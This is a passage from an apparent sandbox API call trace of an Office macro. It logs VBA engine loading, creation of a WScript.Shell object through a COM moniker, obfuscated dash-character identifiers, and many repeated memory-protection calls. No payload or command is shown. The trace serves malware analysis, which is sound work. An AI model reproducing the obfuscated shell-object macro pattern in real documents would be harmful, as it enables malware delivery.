(hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0119.975] GetCurrentProcess () returned 0xffffffff [0119.975] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0119.975] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.976] GetCurrentProcess () returned 0xffffffff [0119.976] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0119.976] GetCurrentProcess () returned 0xffffffff [0119.976] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0119.976] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.976] GetCurrentProcess () returned 0xffffffff [0119.976] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0119.976] GetCurrentProcess () returned 0xffffffff [0119.976] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0119.976] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.977] GetCurrentProcess () returned 0xffffffff [0119.977] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0119.977] GetCurrentProcess () returned 0xffffffff [0119.977] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0119.977] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.978] GetCurrentProcess () returned 0xffffffff [0119.978] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0119.978] GetCurrentProcess () returned 0xffffffff [0119.978] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0119.978] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.978] GetCurrentProcess () returned 0xffffffff [0119.978] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0119.978] GetCurrentProcess () returned 0xffffffff [0119.979] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0119.979] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.979] GetCurrentProcess () returned 0xffffffff [0119.979] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0119.979] GetCurrentProcess () returned 0xffffffff [0119.979] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0119.979] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.980] GetCurrentProcess () returned 0xffffffff [0119.980] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0119.980] GetCurrentProcess () returned 0xffffffff [0119.980] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0119.980] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.981] GetCurrentProcess () returned 0xffffffff [0119.981] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0119.981] GetCurrentProcess () returned 0xffffffff [0119.981] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0119.981] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.981] GetCurrentProcess () returned 0xffffffff [0119.981] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0119.981] GetCurrentProcess () returned 0xffffffff [0119.982] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0119.982] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.982] GetCurrentProcess () returned 0xffffffff [0119.982] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0119.982] GetCurrentProcess () returned 0xffffffff [0119.982] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0119.982] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.983] GetCurrentProcess () returned 0xffffffff [0119.983] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0119.983] GetCurrentProcess () returned 0xffffffff [0119.983] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0119.983] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.984] GetCurrentProcess () returned 0xffffffff [0119.984] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0119.984] GetCurrentProcess () returned 0xffffffff [0119.984] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0119.984] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.984] GetCurrentProcess () returned 0xffffffff [0119.984] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0119.984] GetCurrentProcess () returned 0xffffffff [0119.984] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0119.984] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.985] GetCurrentProcess () returned 0xffffffff [0119.985] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0119.985] GetCurrentProcess () returned 0xffffffff [0119.985] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0119.985] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.986] GetCurrentProcess () returned 0xffffffff [0119.986] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0119.986] GetCurrentProcess () returned 0xffffffff [0119.986] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0119.986] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.986] GetCurrentProcess () returned 0xffffffff [0119.986] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0119.986] SetErrorMode (uMode=0x8001) returned 0x8001 [0119.986] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0119.986] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x695d0000 [0119.987] SetErrorMode (uMode=0x8001) returned 0x8001 [0119.988] GetProcAddress (hModule=0x695d0000, lpProcName=0x272) returned 0x697c533a [0120.080] GetAsyncKeyState (vKey=3) returned 0 [0120.080] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.080] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.080] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.080] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.080] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x1 [0120.080] CreateBindCtx (in: reserved=0x0, ppbc=0x1977f8 | out: ppbc=0x1977f8*=0xcb0a7e0) returned 0x0 [0120.084] MkParseDisplayName (in: pbc=0xcb0a7e0, szUserName="new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B", pchEaten=0x1977fc, ppmk=0x197800 | out: pchEaten=0x1977fc, ppmk=0x197800*=0xcb0ac20) returned 0x0 [0121.074] IUnknown:Release (This=0xcb0a7e0) returned 0x0 [0121.075] BindMoniker (in: pmk=0xcb0ac20, grfOpt=0x0, iidResult=0x697e8088*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvResult=0x1977f4 | out: ppvResult=0x1977f4*=0x8cec484) returned 0x0 [0121.875] IUnknown:Release (This=0xcb0ac20) returned 0x0 [0121.875] GetAsyncKeyState (vKey=3) returned 0 [0121.881] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x197b9c | out: ppsaOut=0x197b9c) returned 0x0 [0121.882] SafeArrayAllocData (psa=0xc844f80) returned 0x0 [0121.942] SafeArrayDestroyData (psa=0xc844f80) returned 0x0 [0121.943] SafeArrayDestroyDescriptor (psa=0xc844f80) returned 0x0 [0121.944] GetAsyncKeyState (vKey=3) returned 0 [0121.949] SetErrorMode (uMode=0x8001) returned 0x8001 [0121.949] _stricmp (_Str1="user32", _Str2="VBE6.DLL") returned -1 [0121.949] LoadLibraryA (lpLibFileName="user32") returned 0x743d0000 [0121.950] SetErrorMode (uMode=0x8001) returned 0x8001 [0121.950] GetProcAddress (hModule=0x743d0000, lpProcName="SetTimer") returned 0x743eee50 [0121.950] SetTimer (hWnd=0x0, nIDEvent=0x9bba020, uElapse=0x1, lpTimerFunc=0x9bba020) returned 0x7f6f [0121.951] GetLastError () returned 0x0 [0121.951] CRetailMalloc_Alloc () returned 0xcb21760 [0121.952] memcpy (in: _Dst=0xb754f48, _Src=0x197714, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0121.952] memcpy (in: _Dst=0xb754f48, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0121.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302f76, cbMultiByte=24, lpWideCharStr=0x1976c4, cchWideChar=25 | out: lpWideCharStr="–———––––——–——–———–——–––") returned 24 [0121.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c07ca, cbMultiByte=24, lpWideCharStr=0x197724, cchWideChar=25 | out: lpWideCharStr="–———––––——–——–———–——–––") returned 24 [0121.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c07ca, cbMultiByte=24, lpWideCharStr=0x197724, cchWideChar=25 | out: lpWideCharStr="–———––––——–——–———–——–––") returned 24 [0121.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c07ca, cbMultiByte=24, lpWideCharStr=0x197724, cchWideChar=25 | out: lpWideCharStr="–———––––——–——–———–——–––") returned 24 [0121.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c07ca, cbMultiByte=24, lpWideCharStr=0x197724, cchWideChar=25 | out: lpWideCharStr="–———––––——–——–———–——–––") returned 24 [0121.954] CRetailMalloc_Alloc () returned 0xcb1f030 [0121.954] _mbscpy_s (in: _Dst=0xcb1f030, _DstSizeInBytes=0x18, _Src=0x112c07ca | out: _Dst=0xcb1f030) returned 0x0 [0121.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0d96, cbMultiByte=31, lpWideCharStr=0x197734, cchWideChar=32 | out: lpWideCharStr="_B_var_–———––––——–——–———–——–––") returned 31 [0121.955] _mbscpy_s (in: _Dst=0x19779c, _DstSizeInBytes=0x18, _Src=0x112c07ca | out: _Dst=0x19779c) returned 0x0 [0121.955] CRetailMalloc_Free () returned 0x1 [0121.955] memcpy (in: _Dst=0xb754f4c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0121.955] memcpy (in: _Dst=0xb754f4c, _Src=0x1978dc, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0121.955] memcpy (in: _Dst=0xb754f48, _Src=0x197888, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0121.955] memcpy (in: _Dst=0xb755050, _Src=0x1978c4, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0121.955] memcpy (in: _Dst=0xb754f48, _Src=0x197714, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0121.955] memcpy (in: _Dst=0xb754f48, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0121.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11300922, cbMultiByte=9, lpWideCharStr=0x1976c4, cchWideChar=10 | out: lpWideCharStr="DoEvents") returned 9 [0121.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e0922, cbMultiByte=9, lpWideCharStr=0x197724, cchWideChar=10 | out: lpWideCharStr="DoEvents") returned 9 [0121.957] memcpy (in: _Dst=0xb754f48, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0121.957] memcpy (in: _Dst=0xb754f4c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0121.958] memcpy (in: _Dst=0xb754f48, _Src=0x197888, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0121.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6980ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0121.958] memcpy (in: _Dst=0xcb217c8, _Src=0x197944, _Size=0x18 | out: _Dst=0xcb217c8) returned 0xcb217c8 [0121.959] CRetailMalloc_Realloc () returned 0xcb21760 [0121.959] CRetailMalloc_Free () returned 0x1 [0121.959] GetCurrentProcess () returned 0xffffffff [0121.959] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0121.959] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0121.960] GetCurrentProcess () returned 0xffffffff [0121.960] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0121.960] GetCurrentProcess () returned 0xffffffff [0121.960] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0121.960] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0121.961] GetCurrentProcess () returned 0xffffffff [0121.961] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0121.961] GetCurrentProcess () returned 0xffffffff [0121.962] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0121.962] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0121.962] GetCurrentProcess () returned 0xffffffff [0121.962] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0121.962] GetCurrentProcess () returned 0xffffffff [0121.962] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0121.962] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0121.963] GetCurrentProcess () returned 0xffffffff [0121.963] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0121.963] GetCurrentProcess () returned 0xffffffff [0121.963] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0121.964] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0121.964] GetCurrentProcess () returned 0xffffffff [0121.964] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0121.964] GetCurrentProcess () returned 0xffffffff [0121.964] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0121.965] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0121.965] GetCurrentProcess () returned 0xffffffff [0121.965] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0121.965] GetCurrentProcess () returned 0xffffffff [0121.966] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0121.966] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0121.966] GetCurrentProcess () returned 0xffffffff [0121.966] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0121.966] GetCurrentProcess () returned 0xffffffff [0121.966] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0121.966] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0121.967] GetCurrentProcess () returned 0xffffffff [0121.967] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0121.967] GetCurrentProcess () returned 0xffffffff [0121.967] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0121.967] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0121.968] GetCurrentProcess () returned 0xffffffff [0121.968] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0121.968] GetCurrentProcess () returned 0xffffffff [0121.968] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0121.968] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0121.970] GetCurrentProcess () returned 0xffffffff [0121.970] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0121.970] GetCurrentProcess () returned 0xffffffff [0121.970] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0121.970] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0121.970] GetCurrentProcess () returned 0xffffffff [0121.970] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0121.970] GetCurrentProcess () returned 0xffffffff [0121.971] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0121.971] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0122.026] GetCurrentProcess () returned 0xffffffff [0122.026] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0122.026] GetCurrentProcess () returned 0xffffffff [0122.026] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0122.026] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0122.027] GetCurrentProcess () returned 0xffffffff [0122.027] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0122.027] GetCurrentProcess () returned 0xffffffff [0122.027] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0122.027] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0122.029] GetCurrentProcess () returned 0xffffffff [0122.029] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0122.029] GetCurrentProcess () returned 0xffffffff [0122.029] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0122.029] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0122.030] GetCurrentProcess () returned 0xffffffff [0122.030] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0122.030] GetCurrentProcess () returned 0xffffffff [0122.030] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0122.030] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0122.032] GetCurrentProcess () returned 0xffffffff [0122.032] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0122.032] GetCurrentProcess () returned 0xffffffff [0122.032] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0122.032] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0122.033] GetCurrentProcess () returned 0xffffffff [0122.034] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0122.034] GetCurrentProcess () returned 0xffffffff [0122.034] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0122.034] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0122.304] GetCurrentProcess () returned 0xffffffff [0122.304] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0122.304] GetCurrentProcess () returned 0xffffffff [0122.304] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0122.304] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0122.305] GetCurrentProcess () returned 0xffffffff [0122.305] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0122.305] GetCurrentProcess () returned 0xffffffff [0122.305] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0122.305] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0122.306] GetCurrentProcess () returned 0xffffffff [0122.306] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0122.306] GetCurrentProcess () returned 0xffffffff [0122.306] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0122.306] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0122.307] GetCurrentProcess () returned 0xffffffff [0122.307] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0122.307] GetCurrentProcess () returned 0xffffffff [0122.307] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0122.307] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0122.307] GetCurrentProcess () returned 0xffffffff [0122.307] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0122.307] GetCurrentProcess () returned 0xffffffff [0122.307] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0122.308] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0122.308] GetCurrentProcess () returned 0xffffffff [0122.308] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0122.308] GetCurrentProcess () returned 0xffffffff [0122.308] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0122.308] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0122.309] GetCurrentProcess () returned 0xffffffff [0122.309] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0122.309] GetCurrentProcess () returned 0xffffffff [0122.309] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0122.309] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0122.310] GetCurrentProcess () returned 0xffffffff [0122.310] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0122.310] GetCurrentProcess () returned 0xffffffff [0122.310] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0122.310] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0122.311] GetCurrentProcess () returned 0xffffffff [0122.311] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0122.311] GetCurrentProcess () returned 0xffffffff [0122.311] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0122.311] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0122.311] GetCurrentProcess () returned 0xffffffff [0122.311] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0122.311] 